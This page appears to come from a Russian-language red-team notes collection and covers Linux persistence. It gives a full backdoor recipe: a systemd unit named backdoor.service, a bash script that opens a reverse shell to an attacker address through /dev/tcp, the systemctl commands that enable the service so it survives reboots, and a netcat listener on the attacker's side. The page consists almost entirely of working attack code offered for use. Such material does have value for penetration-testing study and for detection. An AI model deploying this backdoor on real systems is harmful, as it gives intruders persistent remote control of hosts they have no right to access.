05 - Systemd

systemd β€” это систСма ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ ΠΈ ΠΌΠ΅Π½Π΅Π΄ΠΆΠ΅Ρ€ слуТб Π² Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π΅ дистрибутивов Linux. Π—Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΎΠ΅ пространство ΠΈ дальшС управляСт систСмными процСссами. Π—Π½Π°Ρ‡ΠΈΡ‚ создав ΡΠΎΠ±ΡΡ‚Π²Π΅Π½Π½ΡƒΡŽ Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ слуТбу systemd, ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ бэкдор, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±ΡƒΠ΄Π΅Ρ‚ Π·Π°ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒΡΡ автоматичСски ΠΏΡ€ΠΈ запускС ОБ. Для этого Π½Π°ΠΌ понадобится 2 Ρ„Π°ΠΉΠ»Π°:

  1. Π€Π°ΠΉΠ» слуТбы systemD

  2. Π€Π°ΠΉΠ» врСдоносного скрипта (ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ отдаст Π½Π°ΠΌ revers shell)

// Π‘ΠΎΠ·Π΄Π°Π΅ΠΌ Ρ„Π°ΠΉΠ» слуТбы /etc/systemd/system/backdoor.service
[Unit]
Description=backdoor service
After=network.target

[Service]
Type=simple
ExecStart=/opt/backdoor.sh
Restart=on-abort

[Install]
WantedBy=multi-user.target
// Π‘ΠΎΠ·Π΄Π°Π΅ΠΌ Ρ„Π°ΠΉΠ» врСдоносного скрипта /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1
// ΠŸΠ΅Ρ€Π΅Π·Π°ΠΏΡƒΡΠΊΠ°Π΅ΠΌ слуТбы ΠΈ добавляСм наш сСрвис Π² Π°Π²Ρ‚ΠΎΠ·Π°Π³Ρ€ΡƒΠ·ΠΊΡƒ
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service

// На хостС Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ запускам netcat 
nc -lvp 9010

ΠœΡ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠΌ шСлл послС ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ systemctl start backdoor.service ΠΈ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ Ρ€Π°Π· ΠΊΠΎΠ³Π΄Π° Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΡ‹ΠΉ хост Π±ΡƒΠ΄Π΅Ρ‚ ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠΆΠ΅Π½.

Previous04 - Cron JobsNext06 - Systemd Timers

Last updated